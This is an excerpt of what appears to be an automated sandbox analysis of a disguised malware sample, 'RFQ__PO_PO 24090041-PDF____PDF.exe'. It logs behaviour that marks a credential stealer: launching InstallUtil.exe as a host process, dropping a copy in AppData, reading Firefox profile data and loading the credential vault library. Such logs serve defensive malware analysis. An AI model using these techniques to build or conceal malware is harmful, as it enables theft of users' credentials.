Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: RFQ__PO_PO 24090041-PDF____PDF.exe ReversingLabs: Detection: 34%
Source: RFQ__PO_PO 24090041-PDF____PDF.exe Virustotal: Detection: 25%
Source: RFQ__PO_PO 24090041-PDF____PDF.exe String found in binary or memory: SingularUMatrix5SingularUMatrixWithElement5SingularVectorsNotComputedMSpecialCasePlannedButNotImplementedYet-StopCriterionDuplicate)StopCriterionMissing#StringNullOrEmpty
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe File read: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe "C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe"
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe "C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe"
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe "C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe"
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vaultcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasadhlp.dll
